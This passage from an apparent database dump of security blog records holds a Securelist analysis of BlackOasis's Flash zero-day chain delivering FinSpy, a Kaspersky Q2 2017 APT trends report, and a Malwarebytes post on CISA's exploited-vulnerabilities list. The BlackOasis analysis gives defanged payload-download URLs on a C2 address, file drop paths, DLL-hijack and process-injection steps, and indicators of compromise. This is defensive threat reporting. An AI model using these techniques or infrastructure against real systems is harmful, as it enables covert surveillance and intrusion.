the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)So far only one attack has been observed in our customer base, leading us to believe the number of attacks are minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&amp;C server. Although the exact payload of the attack was no longer in the C&amp;C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE it will look like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here will continue to grow.\n\nWhat does it mean for everyone and how to defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:&lt;/p style=\"margin-bottom:0!important\"&gt;\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "cvss3": {}, "published": "2017-10-16T14:28:47", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "modified": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T03:16:10", "description": "\n\n## Introduction\n\nSince 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya are covered in both private and public reports.\n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-1.png>)\n\nKaspersky's Private Threat Intelligence Portal (TIP)\n\nIn Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months. We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.\n\n## Russian-Speaking Actors\n\nThe second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.\n\nMarch and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third being a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.\n\nGReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long running \"Mosquito Turla\" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign Ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.\n\nJune saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) \"ExPetr\". While initial assessments presumed that this was yet another ransomware attack \u00e0 la WannaCry, a deeper assessment by GReAT places the initial intent as constituting an operation destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence _assessment that the attacks may share traits with the BlackEnergy actors. \n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-2.png>)\n\nBelow is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.\n\n 1. Sofacy Dabbling in New Macro Techniques\n 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning\n 3. Turla EPS Zero Day - early warning\n 4. Mosquito Turla Targets Foreign Affairs Globally\n 5. Update on Zebrocy Activity June 2017\n 6. ExPetr motivation and attribution - Early alert\n 7. BlackBox ATM attacks using SDC bus injection\n\n## English-Speaking Actors\n\nEnglish-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.\n\nContinuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.\n\nOur tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and Middle East. During this investigation, GReAT researchers have also discovered two additional Lambert families (Red Lambert and Brown Lambert) currently under investigation for Q3. Below is a list of report titles for reference:\n\n 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor\n 2. The Gray Lambert \u2013 A Leap in Sophistication to User-land NOBUS Passive Implants\n\n## Korean-speaking Actors\n\nOur researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other \"money-makers\". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.\n\nWannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us, was the probable linkage to Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is a listing of our reports from Q2 on actors with a Korean nexus:\n\n 1. Manuscrypt - malware family distributed by Lazarus\n 2. Lazarus actor targets carders\n 3. Lazarus-linked ATM Malware On the Loose In South Korea\n 4. Lazarus targets electronic currency operators\n 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert\n 6. WannaCry possibly tied to the Lazarus APT Group\n 7. The First WannaCry Spearphish and Module Distribution\n\n## Middle Eastern Actors\n\nWhile there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past; CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.\n\nAfter the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.\n\n 1. OilRig exploiting CVE-2017-0199 in new campaign\n 2. BlackOasis using Ole2Link zero day exploit in the wild\n\n## Chinese-Speaking Actors\n\nOn the Chinese speaking front, we felt it necessary to produce two reports to our customers. While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.\n\nOne of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.\n\nAnother report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.\n\n 1. Updated technical analysis of Hias RAT\n 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia\n\n## Best of the rest\n\nSometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.\n\nDemsty is a new piece of MacOS malware that is targeting University researchers in Hong Kong, among others. At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.\n\nDuring Q2, the mischievous ShadowBrokers also continued their regular activities dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.\n\nReports in the 'unknown' category:\n\n 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis\n 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims\n 3. University Researchers Located in Hong Kong Targeted with Demsty\n\n## Predictions\n\nBased on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:\n\n 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.\n 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.\n 3. Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.\n 4. In China, the past months have been marked by the dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.\n 5. Targeting energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward given their control on oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting as they have in years past.\n 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.\n\n## How to keep yourself protected\n\nOne of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases is very important.\n\nAnother problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry because their focus has been only certain countries or certain industry sectors; only to discover later that their ignorance left them blind to those attacks.\n\nAs shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance \u2013 which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability &amp; Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.\n\nGiven the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.\n\nThe best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.", "cvss3": {}, "published": "2017-08-08T14:00:40", "title": "APT Trends report Q2 2017", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "modified": "2017-08-08T14:00:40", "href": "https://securelist.com/apt-trends-report-q2-2017/79332/", "id": "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2022-03-14T11:27:50", "description": "On Friday March 3, the Cybersecurity and Infrastructure Security Agency (CISA) added a whopping number of 95 new known exploited vulnerabilities to its Known Exploited Vulnerabilities Catalog.\n\nThis catalog provides Federal Civilian Executive Branch (FCEB) agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nBut even if your organization isn&#x27;t a FCEB agency that needs to follow the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list can act as a good guide for your [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>) strategy.\n\n## 95 new ones?\n\nCISA normally sends out a mail every few days in which it details a few important vulnerabilities it&#x27;s added to the Catalog. However, on March 3 it didn\u2019t even enumerate the list. Instead, it just emailed a [link to the Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and included instructions on how to find the most recently added vulnerabilities. If you&#x27;re looking yourself, you need to click on the arrow on the of the &quot;Date Added to Catalog&quot; column, which will sort by descending dates.\n\n## Not so new\n\nThe first thing that jumped out at me is that these vulnerabilities were not all very new at all. The oldest vulnerability on that list is [CVE-**2002**-0367](<https://nvd.nist.gov/vuln/detail/CVE-2002-0367>), an almost 20 year old vulnerability in Windows NT and Windows 2000. In fact, only 5 vulnerabilities were patched in 2022. All these applied to Cisco\u2019s Small Business RV160, RV260, RV340, and RV345 series routers by the way.\n\nThis brings me to the next thing that is remarkable. 38 of the 95 added vulnerabilities are for [Cisco products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-cisco-fixes-several-vulnerabilities/>). Other products include those by Microsoft (27), Adobe (16), and Oracle(7).\n\nOf the Adobe vulnerabilities, nine were found in Flash Player. Adobe Flash Player reached End of Life (EOL) on December 31, 2020, after being first announced in 2017. Since Adobe no longer supports Flash Player, on January 12, 2021, the company started blocking Flash content from running. In fact, [Adobe strongly recommends](<https://www.adobe.com/nl/products/flashplayer/end-of-life.html>) all users immediately uninstall Flash Player to help protect their systems.\n\n## Possible reasons\n\nPondering the reason for CISA to suddenly add 95 vulnerabilities to their list, I came up with the following options:\n\n * It suddenly became aware of several old vulnerabilities that were nonetheless still being exploited.\n * It suddenly decided to list vulnerabilities in software that has long reached EOL but could still be used a lot.\n * The nature of actively exploited vulnerabilities has changed.\n\n## Some examples\n\nPersonally, I suspect that the nature of the actively exploited vulnerabilities has changed. Last year, you would typically see exploited vulnerabilities that would allow an attacker to breach a network or compromise a system to gain a foothold. This allows attackers to exfiltrate data, plant ransomware, and other criminal activities that could lead to financial gain.\n\nHowever, looking at some of the vulnerabilities that were included in this list of 95, I noticed that many could lead to Denial-of-Service (DoS) attacks.\n\nExamples:\n\n * A [vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2016-8562>) in Siemens SIMATIC CP 1543-1 versions before 2.0.28 allows remotely authenticated users to cause a denial of service by modifying SNMP variables.\n * Multiple Cisco vulnerabilities on this list which could result in a DoS condition or cause an affected system to reload.\n\nOther vulnerabilities could allow attackers to run arbitrary code or cause a denial of service. For example, a [PowerPoint](<https://nvd.nist.gov/vuln/detail/CVE-2015-2424>) vulnerability that has been around since 2015 and was found to be used by the Russian state-sponsored team APT28 (aka Fancy Bear) in 2018.\n\nSome [Flash Player vulnerabilities](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) were found to be used in targeted attacks. The suspect in this case was APT37, also known as the North Korean \u201cLazarus\u201d group.\n\nA vulnerability in older Windows versions (Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1) would allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document. The use of this exploit was [attributed](<https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html>) to the Russian \u201cSANDWORM\u201d operation.\n\nI also found an Elevation of Privilege (EoP) [vulnerability in a Windows Installer](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>) on the CISA list that would allow an attacker to delete targeted files on a system. However, they would NOT gain privileges to view or modify file contents.\n\nOther interesting items on the list are some [IoT](<https://blog.malwarebytes.com/glossary/iot/>) vulnerabilities that got some fame in 2020 under the name [Ripple20](<https://www.jsof-tech.com/disclosures/ripple20/>). Successful exploitation of these vulnerabilities could result in denial of service, information disclosure or remote code execution.\n\nSo, is it just me or is there a trend here that shows vulnerabilities that were previously hard to exploit for financial gain, but are perfectly usable to disrupt operations? Could it be that, no surprise, the war in Ukraine has changed the nature of the actively exploited vulnerabilities?\n\nAccording to Adam Kujawa, Security Evangelist and Director of Malwarebytes&#x27; Threat Intel team:\n\n> &quot;In 2007, we observed Russian sympathizers online utilizing hacking tools to launch disruption attacks against Georgian news networks and government networks, to prevent information from flowing to the public while Russia had troops roll in. Similar events have happened in Estonia, and Russian sponsored hackers are known to utilize Ukrainian networks as a kind of \u201cplayground\u201d for their attacks, shutting off power grids and other critical infrastructure, launching massive supply chain attacks against them (as in the case of NotPetya). And those are just some of the attacks we know about.\n\n> With that in mind, I believe that while many of these vulnerabilities are useless against actual intrusion and espionage, the exploits developed from them will be used to disrupt and degrade rather than collect.\n\n> I am not sure how many of these have been used in the wild, and while it is great to see CISA be proactive in spreading this information, I must wonder how much of the information will get to those protecting networks in Ukraine? Could it be that CISA may have just handed over the knowledge about various disruptive exploits that will work on unpatched systems, to be used against those who don\u2019t have endpoint patching as their top priority?&quot;\n\n## Mitigation\n\nGiven the varied nature of the list, the most actionable advice is to keep an eye on the known exploited vulnerabilities catalog. To make things easier, you can [subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_136>) to receive the updates. Besides the [usual security advice](<https://blog.malwarebytes.com/awareness/2022/03/four-smb-cybersecurity-practices-during-geopolitical-upheaval/>), now seems to be a good time to invest in clever [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>), and ditch that software which has reached EOL and no longer receives security updates.\n\nStay safe, everyone!\n\nThe post [CISA list of 95 new known exploited vulnerabilities raises questions](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-03-14T11:18:33", "type": "malwarebytes", "title": "CISA list of 95 new known exploited vulnerabilities raises questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0367", "CVE-2014-4114", "CVE-2015-2424", "CVE-2016-4117", "CVE-2016-8562", "CVE-2021-41379"], "modified": "2022-03-14T11:18:33", "id": "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/", "cvss": {"score": 10.0, "vector": 